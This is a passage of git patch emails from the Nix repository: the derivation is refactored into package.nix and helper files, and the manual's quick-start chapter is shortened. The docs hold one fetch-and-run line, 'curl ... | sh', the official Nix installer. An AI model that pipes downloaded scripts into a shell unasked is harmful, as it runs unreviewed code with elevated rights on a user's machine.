[ + "ccacheStdenv" + "clang11Stdenv" + "clangStdenv" + "gccStdenv" + "libcxxStdenv" + "stdenv" + ]; forAllSystems = lib.genAttrs systems; @@ -326,82 +333,18 @@ ''; }; - binaryTarball = nix: pkgs: - let - inherit (pkgs) buildPackages; - inherit (pkgs) cacert; - installerClosureInfo = buildPackages.closureInfo { rootPaths = [ nix cacert ]; }; - in - - buildPackages.runCommand "nix-binary-tarball-${version}" - { #nativeBuildInputs = lib.optional (system != "aarch64-linux") shellcheck; - meta.description = "Distribution-independent Nix bootstrap binaries for ${pkgs.system}"; - } - '' - cp ${installerClosureInfo}/registration $TMPDIR/reginfo - cp ${./scripts/create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh - substitute ${./scripts/install-nix-from-closure.sh} $TMPDIR/install \ - --subst-var-by nix ${nix} \ - --subst-var-by cacert ${cacert} - - substitute ${./scripts/install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ - --subst-var-by nix ${nix} \ - --subst-var-by cacert ${cacert} - substitute ${./scripts/install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ - --subst-var-by nix ${nix} \ - --subst-var-by cacert ${cacert} - substitute ${./scripts/install-multi-user.sh} $TMPDIR/install-multi-user \ - --subst-var-by nix ${nix} \ - --subst-var-by cacert ${cacert} - - if type -p shellcheck; then - # SC1090: Don't worry about not being able to find - # $nix/etc/profile.d/nix.sh - shellcheck --exclude SC1090 $TMPDIR/install - shellcheck $TMPDIR/create-darwin-volume.sh - shellcheck $TMPDIR/install-darwin-multi-user.sh - shellcheck $TMPDIR/install-systemd-multi-user.sh - - # SC1091: Don't panic about not being able to source - # /etc/profile - # SC2002: Ignore "useless cat" "error", when loading - # .reginfo, as the cat is a much cleaner - # implementation, even though it is "useless" - # SC2116: Allow ROOT_HOME=$(echo ~root) for resolving - # root's home directory - shellcheck --external-sources \ - --exclude SC1091,SC2002,SC2116 $TMPDIR/install-multi-user - fi - - chmod +x $TMPDIR/install - chmod +x $TMPDIR/create-darwin-volume.sh - chmod +x $TMPDIR/install-darwin-multi-user.sh - chmod +x $TMPDIR/install-systemd-multi-user.sh - chmod +x $TMPDIR/install-multi-user - dir=nix-${version}-${pkgs.system} - fn=$out/$dir.tar.xz - mkdir -p $out/nix-support - echo "file binary-dist $fn" >> $out/nix-support/hydra-build-products - tar cvfJ $fn \ - --owner=0 --group=0 --mode=u+rw,uga+r \ - --mtime='1970-01-01' \ - --absolute-names \ - --hard-dereference \ - --transform "s,$TMPDIR/install,$dir/install," \ - --transform "s,$TMPDIR/create-darwin-volume.sh,$dir/create-darwin-volume.sh," \ - --transform "s,$TMPDIR/reginfo,$dir/.reginfo," \ - --transform "s,$NIX_STORE,$dir/store,S" \ - $TMPDIR/install \ - $TMPDIR/create-darwin-volume.sh \ - $TMPDIR/install-darwin-multi-user.sh \ - $TMPDIR/install-systemd-multi-user.sh \ - $TMPDIR/install-multi-user \ - $TMPDIR/reginfo \ - $(cat ${installerClosureInfo}/store-paths) - ''; + binaryTarball = nix: pkgs: pkgs.callPackage ./binary-tarball.nix { + inherit nix; + }; overlayFor = getStdenv: final: prev: - let currentStdenv = getStdenv final; in + let + stdenv = getStdenv final; + + lowdown-nix = final.callPackage ./lowdown.nix { + inherit lowdown-src stdenv; + }; + in { nixStable = prev.nix; @@ -409,129 +352,70 @@ nixUnstable = prev.nixUnstable; nix = - with final; - with commonDeps { - inherit pkgs; - inherit (currentStdenv.hostPlatform) isStatic; - }; - let - canRunInstalled = currentStdenv.buildPlatform.canExecute currentStdenv.hostPlatform; - in currentStdenv.mkDerivation (finalAttrs: { - name = "nix-${version}"; - inherit version; + let + officialRelease = false; + versionSuffix = + if officialRelease + then "" + else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - src = nixSrc; - VERSION_SUFFIX = versionSuffix; + sh = final.busybox-sandbox-shell or (final.busybox.override { + useMusl = true; + enableStatic = true; + enableMinimal = true; + extraConfig = '' + CONFIG_FEATURE_FANCY_ECHO y + CONFIG_FEATURE_SH_MATH y + CONFIG_FEATURE_SH_MATH_64 y - outputs = [ "out" "dev" "doc" ] - ++ lib.optional (currentStdenv.hostPlatform != currentStdenv.buildPlatform) "check"; + CONFIG_ASH y + CONFIG_ASH_OPTIMIZE_FOR_SIZE y - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps - # There have been issues building these dependencies - ++ lib.optionals (currentStdenv.hostPlatform == currentStdenv.buildPlatform) awsDeps - ++ lib.optionals finalAttrs.doCheck checkDeps; + CONFIG_ASH_ALIAS y + CONFIG_ASH_BASH_COMPAT y + CONFIG_ASH_CMDCMD y + CONFIG_ASH_ECHO y + CONFIG_ASH_GETOPTS y + CONFIG_ASH_INTERNAL_GLOB y + CONFIG_ASH_JOB_CONTROL y + CONFIG_ASH_PRINTF y + CONFIG_ASH_TEST y + ''; + }); - propagatedBuildInputs = propagatedDeps; + boehmgc = (final.boehmgc.override { + enableLargeConfig = true; + }).overrideAttrs(o: { + patches = (o.patches or []) ++ [ + ./boehmgc-coroutine-sp-fallback.diff - disallowedReferences = [ boost-nix ]; + # https://github.com/ivmai/bdwgc/pull/586 + ./boehmgc-traceable_allocator-public.diff + ]; + }); - preConfigure = lib.optionalString (! currentStdenv.hostPlatform.isStatic) - '' - # Copy libboost_context so we don't get all of Boost in our closure. - # https://github.com/NixOS/nixpkgs/issues/45462 - mkdir -p $out/lib - cp -pd ${boost-nix}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib - rm -f $out/lib/*.a - ${lib.optionalString currentStdenv.hostPlatform.isLinux '' - chmod u+w $out/lib/*.so.* - patchelf --set-rpath $out/lib:${currentStdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* - ''} - ${lib.optionalString currentStdenv.hostPlatform.isDarwin '' - for LIB in $out/lib/*.dylib; do - chmod u+w $LIB - install_name_tool -id $LIB $LIB - install_name_tool -delete_rpath ${boost-nix}/lib/ $LIB || true - done - install_name_tool -change ${boost-nix}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib - ''} - ''; - - configureFlags = configureFlags ++ - [ "--sysconfdir=/etc" ] ++ - lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" ++ - [ (lib.enableFeature finalAttrs.doCheck "tests") ] ++ - lib.optionals finalAttrs.doCheck testConfigureFlags ++ - lib.optional (!canRunInstalled) "--disable-doc-gen"; - - enableParallelBuilding = true; - - makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; - - doCheck = true; - - installFlags = "sysconfdir=$(out)/etc"; - - postInstall = '' - mkdir -p $doc/nix-support - echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products - ${lib.optionalString currentStdenv.hostPlatform.isStatic '' - mkdir -p $out/nix-support - echo "file binary-dist $out/bin/nix" >> $out/nix-support/hydra-build-products - ''} - ${lib.optionalString currentStdenv.isDarwin '' - install_name_tool \ - -change ${boost-nix}/lib/libboost_context.dylib \ - $out/lib/libboost_context.dylib \ - $out/lib/libnixutil.dylib - install_name_tool \ - -change ${boost-nix}/lib/libboost_regex.dylib \ - $out/lib/libboost_regex.dylib \ - $out/lib/libnixexpr.dylib - ''} - ''; - - doInstallCheck = finalAttrs.doCheck; - installCheckFlags = "sysconfdir=$(out)/etc"; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv - - separateDebugInfo = !currentStdenv.hostPlatform.isStatic; - - strictDeps = true; - - hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - - passthru.perl-bindings = final.callPackage ./perl { - inherit fileset; - stdenv = currentStdenv; + in final.callPackage ./package.nix { + inherit + boehmgc + fileset + sh + stdenv + versionSuffix + ; + boost = final.boost.override { enableIcu = false; }; + libgit2 = final.libgit2.overrideAttrs (attrs: { + src = libgit2; + version = libgit2.lastModifiedDate; + cmakeFlags = attrs.cmakeFlags or [] + ++ [ "-DUSE_SSH=exec" ]; + }); + lowdown = lowdown-nix; + officialRelease = false; }; - meta.platforms = lib.platforms.unix; - meta.mainProgram = "nix"; - }); - - boost-nix = final.boost.override { - enableIcu = false; + inherit lowdown-nix; }; - lowdown-nix = with final; currentStdenv.mkDerivation rec { - name = "lowdown-0.9.0"; - - src = lowdown-src; - - outputs = [ "out" "bin" "dev" ]; - - nativeBuildInputs = [ buildPackages.which ]; - - configurePhase = '' - ${if (currentStdenv.isDarwin && currentStdenv.isAarch64) then "echo \"HAVE_SANDBOX_INIT=false\" > configure.local" else ""} - ./configure \ - PREFIX=${placeholder "dev"} \ - BINDIR=${placeholder "bin"}/bin - ''; - }; - }; - in { # A Nixpkgs overlay that overrides the 'nix' and # 'nix.perl-bindings' packages. diff --git a/lowdown.nix b/lowdown.nix new file mode 100644 index 000000000..5f469fad5 --- /dev/null +++ b/lowdown.nix @@ -0,0 +1,22 @@ +{ lib +, stdenv +, which +, lowdown-src +}: + +stdenv.mkDerivation rec { + name = "lowdown-0.9.0"; + + src = lowdown-src; + + outputs = [ "out" "bin" "dev" ]; + + nativeBuildInputs = [ which ]; + + configurePhase = '' + ${lib.optionalString (stdenv.isDarwin && stdenv.isAarch64) "echo \"HAVE_SANDBOX_INIT=false\" > configure.local"} + ./configure \ + PREFIX=${placeholder "dev"} \ + BINDIR=${placeholder "bin"}/bin + ''; +} diff --git a/package.nix b/package.nix new file mode 100644 index 000000000..ae075acf7 --- /dev/null +++ b/package.nix @@ -0,0 +1,239 @@ +{ lib +, callPackage +, stdenv +, versionSuffix ? "" +, officialRelease ? false +, buildUnreleasedNotes ? false +, autoconf-archive +, autoreconfHook +, aws-sdk-cpp +, boehmgc +, nlohmann_json +, bison +, boost +, brotli +, bzip2 +, changelog-d +, curl +, editline +, fileset +, flex +, git +, gtest +, jq +, libarchive +, libcpuid +, libgit2 +, libseccomp +, libsodium +, lowdown +, mdbook +, mdbook-linkcheck +, mercurial +, openssh +, openssl +, pkg-config +, rapidcheck +, sh +, sqlite +, util-linux +, xz +}: + +let + + version = lib.fileContents ./.version + versionSuffix; + + inherit (stdenv.hostPlatform) isStatic; + + canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; +in + +stdenv.mkDerivation (finalAttrs: { + name = "nix-${version}"; + inherit version; + + src = + let + baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; + configureFiles = fileset.unions [ + ./.version + ./configure.ac + ./m4 + # TODO: do we really need README.md? It doesn't seem used in the build. + ./README.md + ]; + + topLevelBuildFiles = fileset.unions [ + ./local.mk + ./Makefile + ./Makefile.config.in + ./mk + ]; + + functionalTestFiles = fileset.unions [ + ./tests/functional + (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) + ]; + + in + fileset.toSource { + root = ./.; + fileset = fileset.intersect baseFiles (fileset.unions [ + configureFiles + topLevelBuildFiles + ./boehmgc-coroutine-sp-fallback.diff + ./doc + ./misc + ./precompiled-headers.h + ./src + ./unit-test-data + ./COPYING + ./scripts/local.mk + functionalTestFiles + ]); + }; + + VERSION_SUFFIX = versionSuffix; + + outputs = [ "out" "dev" "doc" ] + ++ lib.optional (stdenv.hostPlatform != stdenv.buildPlatform) "check"; + + nativeBuildInputs = [ + bison + flex + (lib.getBin lowdown) + mdbook + mdbook-linkcheck + autoconf-archive + autoreconfHook + pkg-config + + # Tests + git + mercurial # FIXME: remove? only needed for tests + jq # Also for custom mdBook preprocessor. + openssh # only needed for tests (ssh-keygen) + ] + ++ lib.optional stdenv.hostPlatform.isLinux util-linux + # Official releases don't have rl-next, so we don't need to compile a changelog + ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d; + + buildInputs = [ + boost + brotli + bzip2 + curl + editline + libarchive + libgit2 + libsodium + lowdown + openssl + sqlite + xz + ] + ++ lib.optionals stdenv.isLinux [libseccomp] + ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid + # There have been issues building these dependencies + ++ lib.optionals (stdenv.hostPlatform == stdenv.buildPlatform) (lib.optional (stdenv.isLinux || stdenv.isDarwin) + (aws-sdk-cpp.override { + apis = ["s3" "transfer"]; + customMemoryManagement = false; + })) + ++ lib.optionals finalAttrs.doCheck ([ + gtest + rapidcheck + ]); + + propagatedBuildInputs = [ + boehmgc + nlohmann_json + ]; + + disallowedReferences = [ boost ]; + + preConfigure = lib.optionalString (! stdenv.hostPlatform.isStatic) + '' + # Copy libboost_context so we don't get all of Boost in our closure. + # https://github.com/NixOS/nixpkgs/issues/45462 + mkdir -p $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + rm -f $out/lib/*.a + ${lib.optionalString stdenv.hostPlatform.isLinux '' + chmod u+w $out/lib/*.so.* + patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* + ''} + ${lib.optionalString stdenv.hostPlatform.isDarwin '' + for LIB in $out/lib/*.dylib; do + chmod u+w $LIB + install_name_tool -id $LIB $LIB + install_name_tool -delete_rpath ${boost}/lib/ $LIB || true + done + install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib + ''} + ''; + + configureFlags = + lib.optionals stdenv.isLinux [ + "--with-boost=${boost}/lib" + "--with-sandbox-shell=${sh}/bin/busybox" + ] + ++ lib.optionals (stdenv.isLinux && !(isStatic && stdenv.system == "aarch64-linux")) [ + "LDFLAGS=-fuse-ld=gold" + ] + ++ [ "--sysconfdir=/etc" ] + ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" + ++ [ (lib.enableFeature finalAttrs.doCheck "tests") ] + ++ lib.optionals finalAttrs.doCheck ([ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] + ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ + "--enable-install-unit-tests" + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + "--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ]) + ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; + + enableParallelBuilding = true; + + makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; + + doCheck = true; + + installFlags = "sysconfdir=$(out)/etc"; + + postInstall = '' + mkdir -p $doc/nix-support + echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products + ${lib.optionalString stdenv.hostPlatform.isStatic '' + mkdir -p $out/nix-support + echo "file binary-dist $out/bin/nix" >> $out/nix-support/hydra-build-products + ''} + ${lib.optionalString stdenv.isDarwin '' + install_name_tool \ + -change ${boost}/lib/libboost_context.dylib \ + $out/lib/libboost_context.dylib \ + $out/lib/libnixutil.dylib + install_name_tool \ + -change ${boost}/lib/libboost_regex.dylib \ + $out/lib/libboost_regex.dylib \ + $out/lib/libnixexpr.dylib + ''} + ''; + + doInstallCheck = finalAttrs.doCheck; + installCheckFlags = "sysconfdir=$(out)/etc"; + installCheckTarget = "installcheck"; # work around buggy detection in stdenv + + separateDebugInfo = !stdenv.hostPlatform.isStatic; + + strictDeps = true; + + hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; + + passthru.perl-bindings = callPackage ./perl { + inherit fileset stdenv; + }; + + meta.platforms = lib.platforms.unix; + meta.mainProgram = "nix"; +}) From c64190e65048547712fcf7a0ae09fbfd0a709474 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 30 Nov 2023 22:49:02 +0000 Subject: [PATCH 017/654] Run statix --- flake.nix | 6 +++--- package.nix | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/flake.nix b/flake.nix index a1fc1cd1c..e32a84ae5 100644 --- a/flake.nix +++ b/flake.nix @@ -7,7 +7,7 @@ inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; - outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2 }: + outputs = { self, nixpkgs, nixpkgs-regression, lowdown-src, libgit2, ... }: let inherit (nixpkgs) lib; @@ -183,7 +183,7 @@ "--enable-internal-api-docs" ]; - changelog-d = pkgs.buildPackages.changelog-d; + inherit (pkgs.buildPackages) changelog-d; nativeBuildDeps = [ @@ -349,7 +349,7 @@ nixStable = prev.nix; # Forward from the previous stage as we don’t want it to pick the lowdown override - nixUnstable = prev.nixUnstable; + inherit (prev) nixUnstable; nix = let diff --git a/package.nix b/package.nix index ae075acf7..8d62120fb 100644 --- a/package.nix +++ b/package.nix @@ -141,10 +141,10 @@ stdenv.mkDerivation (finalAttrs: { apis = ["s3" "transfer"]; customMemoryManagement = false; })) - ++ lib.optionals finalAttrs.doCheck ([ + ++ lib.optionals finalAttrs.doCheck [ gtest rapidcheck - ]); + ]; propagatedBuildInputs = [ boehmgc From f55ee7cf7753caee7a27052fab679d8c8fe27cc4 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 30 Nov 2023 22:53:07 +0000 Subject: [PATCH 018/654] little refactoring --- flake.nix | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/flake.nix b/flake.nix index e32a84ae5..544a07ba6 100644 --- a/flake.nix +++ b/flake.nix @@ -459,8 +459,21 @@ # to https://nixos.org/nix/install. It downloads the binary # tarball for the user's system and calls the second half of the # installation script. - installerScript = installScriptFor [ "x86_64-linux" "i686-linux" "aarch64-linux" "x86_64-darwin" "aarch64-darwin" "armv6l-linux" "armv7l-linux" ]; - installerScriptForGHA = installScriptFor [ "x86_64-linux" "x86_64-darwin" "armv6l-linux" "armv7l-linux"]; + installerScript = installScriptFor [ + "aarch64-linux" + "armv6l-linux" + "armv7l-linux" + "i686-linux" + "x86_64-linux" + "aarch64-darwin" + "x86_64-darwin" + ]; + installerScriptForGHA = installScriptFor [ + "armv6l-linux" + "armv7l-linux" + "x86_64-linux" + "x86_64-darwin" + ]; # docker image with Nix inside dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); From 02d9cf2d303e4e7e283dba2f3181f3e40843c354 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 1 Dec 2023 00:41:19 +0100 Subject: [PATCH 019/654] shorten the quick start chapter this focuses on `nix-shell -p` and refers to search.nixos.org for package search, which is currently the easiest and most effective way to find program names. --- doc/manual/src/quick-start.md | 87 +++++++---------------------------- 1 file changed, 16 insertions(+), 71 deletions(-) diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md index 5f54abbde..04a0b7c96 100644 --- a/doc/manual/src/quick-start.md +++ b/doc/manual/src/quick-start.md @@ -1,10 +1,9 @@ # Quick Start -This chapter is for impatient people who don't like reading -documentation. For more in-depth information you are kindly referred -to subsequent chapters. +This chapter is for impatient people who don't like reading documentation. +For more in-depth information you are kindly referred to subsequent chapters. -1. Install Nix by running the following: +1. Install Nix: ```console $ curl -L https://nixos.org/nix/install | sh @@ -13,87 +12,33 @@ to subsequent chapters. The install script will use `sudo`, so make sure you have sufficient rights. On Linux, `--daemon` can be omitted for a single-user install. - For other installation methods, see [here](installation/index.md). + For other installation methods, see the detailed [installation instructions](installation/index.md). -1. See what installable packages are currently available in the - channel: +1. Run software without installing it permanently: ```console - $ nix-env --query --available --attr-path - nixpkgs.docbook_xml_dtd_43 docbook-xml-4.3 - nixpkgs.docbook_xml_dtd_45 docbook-xml-4.5 - nixpkgs.firefox firefox-33.0.2 - nixpkgs.hello hello-2.9 - nixpkgs.libxslt libxslt-1.1.28 - … + $ nix-shell --packages cowsay lolcat ``` -1. Install some packages from the channel: + This downloads the specified packages with all their dependencies, and drops you into a Bash shell where the commands provided by those packages are present. + This will not affect your normal environment: ```console - $ nix-env --install --attr nixpkgs.hello + [nix-shell:~]$ cowsay Hello, Nix! | lolcat ``` - This should download pre-built packages; it should not build them - locally (if it does, something went wrong). - -1. Test that they work: + Exiting the shell will make the programs disappear again: ```console - $ which hello - /home/eelco/.nix-profile/bin/hello - $ hello - Hello, world! - ``` - -1. Uninstall a package: - - ```console - $ nix-env --uninstall hello - ``` - -1. You can also test a package without installing it: - - ```console - $ nix-shell --packages hello - ``` - - This builds or downloads GNU Hello and its dependencies, then drops - you into a Bash shell where the `hello` command is present, all - without affecting your normal environment: - - ```console - [nix-shell:~]$ hello - Hello, world! - [nix-shell:~]$ exit - - $ hello - hello: command not found + $ lolcat + lolcat: command not found ``` -1. To keep up-to-date with the channel, do: +1. Search for more packages on to try them out. + +1. Free up storage space: ```console - $ nix-channel --update nixpkgs - $ nix-env --upgrade '*' - ``` - - The latter command will upgrade each installed package for which - there is a “newer” version (as determined by comparing the version - numbers). - -1. If you're unhappy with the result of a `nix-env` action (e.g., an - upgraded package turned out not to work properly), you can go back: - - ```console - $ nix-env --rollback - ``` - -1. You should periodically run the Nix garbage collector to get rid of - unused packages, since uninstalls or upgrades don't actually delete - them: - - ```console - $ nix-collect-garbage --delete-old + $ nix-collect-garbage ``` From d5e934fb73496a2509755be5945a8bcf1730d59d Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 1 Dec 2023 01:54:48 +0100 Subject: [PATCH 020/654] add redirect to new store page --- doc/manual/_redirects | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/_redirects b/doc/manual/_redirects index 2038671d7..62c693c97 100644 --- a/doc/manual/_redirects +++ b/doc/manual/_redirects @@ -31,9 +31,9 @@ /installation/installation /installation 301! /package-management/basic-package-mgmt /command-ref/nix-env 301! -/package-management/channels* /command-ref/nix-channel 301! +/package-management/channels /command-ref/nix-channel 301! /package-management/package-management /package-management 301! -/package-management/s3-substituter* /command-ref/new-cli/nix3-help-stores#s3-binary-cache-store 301! +/package-management/s3-substituter /store/types/s3-binary-cache-store 301! /protocols/protocols /protocols 301! From eff9b12bc296213c3ba824e90869bcafc4103e1c Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Fri, 1 Dec 2023 11:25:22 +0000 Subject: [PATCH 021/654] Further changes --- binary-tarball.nix | 6 ++- coverage.nix | 35 ++++++++++++++ flake.nix | 115 ++++++++++----------------------------------- package.nix | 88 +++++++++++++++++----------------- 4 files changed, 108 insertions(+), 136 deletions(-) create mode 100644 coverage.nix diff --git a/binary-tarball.nix b/binary-tarball.nix index 1fa185519..0053abbca 100644 --- a/binary-tarball.nix +++ b/binary-tarball.nix @@ -1,8 +1,8 @@ { runCommand -, version , system -, nix +, buildPackages , cacert +, nix }: let @@ -11,6 +11,8 @@ let rootPaths = [ nix cacert ]; }; + inherit (nix) version; + env = { meta.description = "Distribution-independent Nix bootstrap binaries for ${system}"; }; diff --git a/coverage.nix b/coverage.nix new file mode 100644 index 000000000..2390ef52d --- /dev/null +++ b/coverage.nix @@ -0,0 +1,35 @@ +{ lib +, releaseTools +, nix +, stdenv +}: + +let + inherit (nix) version; + +in + +releaseTools.coverageAnalysis { + name = "nix-coverage-${version}"; + + inherit (nix) + src + configureFlags + nativeBuildInputs + buildInputs + #checkInputs + ; + + enableParallelBuilding = true; + + dontInstall = false; + + doInstallCheck = true; + installCheckTarget = "installcheck"; # work around buggy detection in stdenv + + lcovFilter = [ "*/boost/*" "*-tab.*" ]; + + hardeningDisable = ["fortify"]; + + NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; +} diff --git a/flake.nix b/flake.nix index 544a07ba6..c0841a76d 100644 --- a/flake.nix +++ b/flake.nix @@ -479,60 +479,25 @@ dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); # Line coverage analysis. - coverage = - with nixpkgsFor.x86_64-linux.native; - with commonDeps { inherit pkgs; }; - - releaseTools.coverageAnalysis { - name = "nix-coverage-${version}"; - - src = nixSrc; - - configureFlags = testConfigureFlags; - - enableParallelBuilding = true; - - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps ++ propagatedDeps ++ awsDeps ++ checkDeps; - - dontInstall = false; - - doInstallCheck = true; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv - - lcovFilter = [ "*/boost/*" "*-tab.*" ]; - - hardeningDisable = ["fortify"]; - - NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; - }; + coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; # API docs for Nix's unstable internal C++ interfaces. - internal-api-docs = - with nixpkgsFor.x86_64-linux.native; - with commonDeps { inherit pkgs; }; + internal-api-docs = nixpkgsFor.x86_64-linux.native.nix.overrideAttrs (old: { + pname = "nix-internal-api-docs"; - stdenv.mkDerivation { - pname = "nix-internal-api-docs"; - inherit version; + configureFlags = old.configureFlags ++ [ "--enable-internal-api-docs" ]; + nativeBuildInputs = old.nativeBuildInputs ++ [ nixpkgsFor.x86_64-linux.native.doxygen ]; - src = nixSrc; + dontBuild = true; + doCheck = false; - configureFlags = testConfigureFlags ++ internalApiDocsConfigureFlags; + installTargets = [ "internal-api-html" ]; - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps ++ propagatedDeps - ++ awsDeps ++ checkDeps ++ internalApiDocsDeps; - - dontBuild = true; - - installTargets = [ "internal-api-html" ]; - - postInstall = '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products - ''; - }; + postInstall = '' + mkdir -p $out/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products + ''; + }); # System tests. tests = import ./tests/nixos { inherit lib nixpkgs nixpkgsFor; } // { @@ -540,7 +505,9 @@ # Make sure that nix-env still produces the exact same result # on a particular version of Nixpkgs. evalNixpkgs = - with nixpkgsFor.x86_64-linux.native; + let + inherit (nixpkgsFor.x86_64-linux.native) runCommand nix nixpkgs-regression; + in runCommand "eval-nixos" { buildInputs = [ nix ]; } '' type -p nix-env @@ -627,47 +594,17 @@ stdenvs))); devShells = let - makeShell = pkgs: stdenv: - let - canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; - in - with commonDeps { inherit pkgs; }; - stdenv.mkDerivation { - name = "nix"; + makeShell = pkgs: stdenv: (pkgs.nix.override { inherit stdenv; }).overrideAttrs (_: { + installFlags = "sysconfdir=$(out)/etc"; + shellHook = '' + PATH=$prefix/bin:$PATH + unset PYTHONPATH + export MANPATH=$out/share/man:$MANPATH - outputs = [ "out" "dev" "doc" ] - ++ lib.optional (stdenv.hostPlatform != stdenv.buildPlatform) "check"; - - nativeBuildInputs = nativeBuildDeps - ++ lib.optional stdenv.cc.isClang pkgs.buildPackages.bear - ++ lib.optional - (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) - pkgs.buildPackages.clang-tools - # We want changelog-d in the shell even if the current build doesn't need it - ++ lib.optional (officialRelease || ! buildUnreleasedNotes) changelog-d - ; - - buildInputs = buildDeps ++ propagatedDeps - ++ awsDeps ++ checkDeps ++ internalApiDocsDeps; - - configureFlags = configureFlags - ++ testConfigureFlags ++ internalApiDocsConfigureFlags - ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; - - enableParallelBuilding = true; - - installFlags = "sysconfdir=$(out)/etc"; - - shellHook = - '' - PATH=$prefix/bin:$PATH - unset PYTHONPATH - export MANPATH=$out/share/man:$MANPATH - - # Make bash completion work. - XDG_DATA_DIRS+=:$out/share - ''; - }; + # Make bash completion work. + XDG_DATA_DIRS+=:$out/share + ''; + }); in forAllSystems (system: let diff --git a/package.nix b/package.nix index 8d62120fb..bed77ba3b 100644 --- a/package.nix +++ b/package.nix @@ -41,16 +41,12 @@ }: let - version = lib.fileContents ./.version + versionSuffix; - - inherit (stdenv.hostPlatform) isStatic; - canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; in stdenv.mkDerivation (finalAttrs: { - name = "nix-${version}"; + pname = "nix"; inherit version; src = @@ -103,17 +99,12 @@ stdenv.mkDerivation (finalAttrs: { bison flex (lib.getBin lowdown) + jq # Also for custom mdBook preprocessor. mdbook mdbook-linkcheck autoconf-archive autoreconfHook pkg-config - - # Tests - git - mercurial # FIXME: remove? only needed for tests - jq # Also for custom mdBook preprocessor. - openssh # only needed for tests (ssh-keygen) ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux # Official releases don't have rl-next, so we don't need to compile a changelog @@ -133,19 +124,29 @@ stdenv.mkDerivation (finalAttrs: { sqlite xz ] - ++ lib.optionals stdenv.isLinux [libseccomp] + ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid # There have been issues building these dependencies - ++ lib.optionals (stdenv.hostPlatform == stdenv.buildPlatform) (lib.optional (stdenv.isLinux || stdenv.isDarwin) + ++ lib.optional (stdenv.hostPlatform == stdenv.buildPlatform && (stdenv.isLinux || stdenv.isDarwin)) (aws-sdk-cpp.override { apis = ["s3" "transfer"]; customMemoryManagement = false; - })) - ++ lib.optionals finalAttrs.doCheck [ + }) + ; + + doCheck = true; + + checkInputs = [ gtest rapidcheck ]; + nativeCheckInputs = [ + git + mercurial # FIXME: remove? only needed for tests + openssh # only needed for tests (ssh-keygen) + ]; + propagatedBuildInputs = [ boehmgc nlohmann_json @@ -153,52 +154,49 @@ stdenv.mkDerivation (finalAttrs: { disallowedReferences = [ boost ]; - preConfigure = lib.optionalString (! stdenv.hostPlatform.isStatic) - '' - # Copy libboost_context so we don't get all of Boost in our closure. - # https://github.com/NixOS/nixpkgs/issues/45462 - mkdir -p $out/lib - cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib - rm -f $out/lib/*.a - ${lib.optionalString 